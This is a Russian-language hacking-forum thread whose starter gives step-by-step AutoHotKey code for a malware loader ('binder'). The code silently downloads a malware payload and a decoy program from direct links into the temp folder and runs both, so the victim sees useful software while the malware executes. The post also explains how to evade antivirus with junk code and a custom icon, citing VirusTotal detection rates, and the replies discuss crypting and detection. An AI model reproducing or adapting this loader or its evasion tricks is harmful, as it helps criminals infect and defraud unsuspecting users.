Загрузка...

Author's article We make gluing and loader with our own hands! 0 investments!

Thread in Virology created by ОхранникОффтопа May 4, 2019. (bumped May 4, 2019) 8707 views

  1. ОхранникОффтопа
    ОхранникОффтопа Topic starter May 4, 2019 1437 Jan 12, 2019
    Здарова ребят, сегодня я покажу бесплатный способ сделать простенький лоадер для вашего мальваря.
    Помимо всей лёгкости этого дела, данному лоадеру очень легко чистить детекты.

    Почему это лучше покупных лоадеров?
    А вам нравится каждую неделю платить за чистку детектов? Если вы конечно, не умеете сами криптовать файлы.
    Здесь же всё очень просто, и вы не рискуете своим мальварём, ибо пользователь с ним напрямую не контактирует.
    А также нет зависимостей и не нужны права администратора.

    Язык программирования: AutoHotKey. Уровень сложности: тупой сампер. Поехали! :roflanebalo:

    Для начала, где будем писать?
    Да где угодно, хоть в блокноте, главное потом текстовому файлу изменить разрешение на .ahk
    Но для своей удобности я воспользуюсь SciTE4AutoHotKey, Т9 на функции, компилятор и прочие приколюхи.
    Также устанавливаем библиотеку AutoHotKey с официального сайта — autohotkey.com

    С чего начнём?
    Начнём с того, что обозначим, что наша программа будет работать без иконки в трее.
    Code
    #NoTrayIcon
    Далее, загружаем склеиваемый файл и сам мальварь на хостинг, или ФО. Главное чтобы на них была прямая ссылка.
    После этого, вставляем 2 функции загрузки файла, с сохранением в временное хранилище.

    Code
    #NoTrayIcon

    URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА МАЛЬВАРЬ, %A_Temp%\st.exe
    URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА СКЛЕИВАЕМЫЙ ФАЙЛ, %A_Temp%\keymaker.exe
    Первый файл - пусть будет условно наш ******.
    Второй файл - софт, который просто нужен жертве.

    Далее, запускаем цикл, который проверяет файлы на наличие, и после их обнаружения запускающий их.

    Code
    #NoTrayIcon

    URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА МАЛЬВАРЬ, %A_Temp%\st.exe
    URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА СКЛЕИВАЕМЫЙ ФАЙЛ, %A_Temp%\keymaker.exe

    Loop
    {
    IfExist, %A_Temp%\st.exe
    {
    IfExist, %A_Temp%\keymaker.exe
    {
    Run, %A_Temp%\keymaker.exe
    Run, %A_Temp%\st.exe
    Sleep, 1000
    ExitApp
    }
    }
    }
    IfExist проверяет наличие файлов в временном хранилище. После проверки, если она успешная, запускаются 2 файла, наш мальварь, и софт который собственно нужен жертве.
    Далее просто лоадер закрывается, пользователь работает с софтом который ему нужен, а мальварь выполняет своё дело.

    Как чистить детекты?
    Очень просто, добавляем бесполезную нагрузку в код софта, например присваиваем переменным различные значения:
    Code

    #NoTrayIcon

    URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА МАЛЬВАРЬ, %A_Temp%\st.exe
    URLDownloadToFile, ПРЯМАЯ ССЫЛКА НА СКЛЕИВАЕМЫЙ ФАЙЛ, %A_Temp%\keymaker.exe

    Loop
    {
    IfExist, %A_Temp%\st.exe
    {
    IfExist, %A_Temp%\keymaker.exe
    {
    Run, %A_Temp%\keymaker.exe
    Run, %A_Temp%\st.exe
    Sleep, 1000
    ExitApp
    }
    }
    }




    A:= 228
    B:= A
    C:= "fqfqfvwg"
    B:= C
    A:= 25868
    После этого, детект чистится.

    После написания компилируем в exe и радуемся.
    Вес билда ~ 700 кб.
    [IMG]

    После компиляции у софта будет такая иконка:
    [IMG]
    Для установления кастомной иконки воспользуемся компилятором от AutoHotKey.
    Переходим по пути: Ваш путь\AutoHotkey\Compiler
    Запускаем Ahk2Exe, и в строке Custom Icon выбираем свою иконку, компилируем.
    [IMG]

    Также добавлю из своих наблюдений касательно детектов:
    Начальный детект - 2/70
    Спустя 2-3 дня детект - не более 6/70
    При этом начальный детект составляет 2 нонейм АВ, а в конечном там максимум окажется Kaspersky.
    И это всё учитывая то, что я намеренно сливал на VirusTotal для проверки данной информации.
    Так что у Вас может быть всё куда круче!

    Вот и всё, вроде бы рассказал обо всех аспектах этого дела.
    Надеюсь кому-нибудь будет полезна эта информация, и сэкономит не мало деньжат.
    Всем спасибо :vinny:
     
  2. ayan2030
    ayan2030 May 4, 2019 Banned 8 Feb 27, 2017
    sharaskidaem а что если наш мальварь с детектами?
     
  3. Tawer1337
    Tawer1337 May 4, 2019 ✵✵✵✵✵✵✵✵ 531 Oct 22, 2016
    ayan2030, сделать крипт для малваря, не?
     
  4. ОхранникОффтопа
    ОхранникОффтопа Topic starter May 5, 2019 1437 Jan 12, 2019
    Народ жду вашего мнения)
     
  5. NikitaJoy1992
    NikitaJoy1992 May 5, 2019 Banned 180 Nov 4, 2017
    Очень хорошая тема !
     
  6. Cal_inactive496112
    Чистим детекты добавлением мусорного кода, пизда
     
  7. PashaPlay
    PashaPlay May 5, 2019 2 Jun 14, 2017
    + Годная тема !
     
  8. ОхранникОффтопа
    ОхранникОффтопа Topic starter May 5, 2019 1437 Jan 12, 2019
    Я всегда проверяю то, что публикую.
    Детект на минимале держится несколько дней, это работает, хотя и звучит не очень
    Плюс к этому добавить стоит что ЯП этот не юзался вообще для мальваря, так что для антивирусов это что-то новое
     
  9. whom
    whom May 6, 2019 Качественная разработка lolz.live/threads/7145903
  10. whom
    whom May 6, 2019 Качественная разработка lolz.live/threads/7145903
  11. TomRedl
    TomRedl May 6, 2019 333 Mar 8, 2018
    Чел в любом случае сольет лоадер на вирус тотал , а вирус тотал найдет в лоадере ******* . так что он не защитит вас от "юзеров"
     
  12. ОхранникОффтопа
    ОхранникОффтопа Topic starter May 7, 2019 1437 Jan 12, 2019
    Уже неделю детекты не повышаются на ******е, каждые 2-3 дня лоадеру чищу и всё
     
  13. TomRedl
    TomRedl May 7, 2019 333 Mar 8, 2018
    ОхранникОффтопа, Возьми хеш своего *******а md5 либо sha не ебу , и чекни не лежит ли он на вт , тогда и поймешь
     
  14. ОхранникОффтопа
    ОхранникОффтопа Topic starter May 7, 2019 1437 Jan 12, 2019
    Да я и до того как эту херь придумал юзал его, естественно лежит.
    Но прикол в том, что реально уже неделю детекты не повышаются на ******е. При том, что я свой же лоадер специально на ВТ заливал для чека.
     
  15. Енот272_inactive171964
    Енот272_inactive171964 May 7, 2019 Ушел на покой 372 Sep 6, 2017
    URLDownloadToFile winapi функция которую спокойно палит любой ав и дефендер на ратайме. какого хуя тут вообще это обсуждается, если сам смысл обсуждения похерен
     
  16. Енот272_inactive171964
    Енот272_inactive171964 May 7, 2019 Ушел на покой 372 Sep 6, 2017
    >> лоадер специально на ВТ заливал
    КАК ЖЕ ВЕСЕЛО БЛЯД
     
  17. ОхранникОффтопа
    ОхранникОффтопа Topic starter May 7, 2019 1437 Jan 12, 2019
    Дефендер не ругается на него, проверь, потом уже говори)
    Весь прикол в том, что всем похуй на лоадер, кроме антивирусов. А прятать его от них приходится всего раз в 2-3 дня уделяя минут 5 времени. И то за пару дней только детектов 3-5 набежит, и всё. Я поэтому и запостил это сюда, потому что это пздц как дёшево и легко
     
  18. Енот272_inactive171964
    Енот272_inactive171964 May 7, 2019 Ушел на покой 372 Sep 6, 2017
    мужик, рекомендую если вкатываешься в малварь, очень глубоко изучать винапи и то какие функции и как палятся. мне проверять незачем, я проверил все до тебя уже сотни раз. ты новичек, я это вижу. но не думай что ты пересек ту черту нубства, которую я пересек 1.5 года тому назад.
     
  19. ОхранникОффтопа
    ОхранникОффтопа Topic starter May 10, 2019 1437 Jan 12, 2019
    Полтора года не научили тебя проверять то, о чём говоришь. Я проливал уже на этот лоадер, абсолютно всем похуй на него, поверь. Просто возьми и сам это сделай, если тебе так не верится, что дефендеру на него абсолютно плевать, а антивирусы без детектов и подавно хуй клали на него
     
  20. hakzcode
    hakzcode May 21, 2019 Banned 5 May 3, 2019
    Годно, так и хочется симпу въебать, но не могу ._.
     
Loading...
Top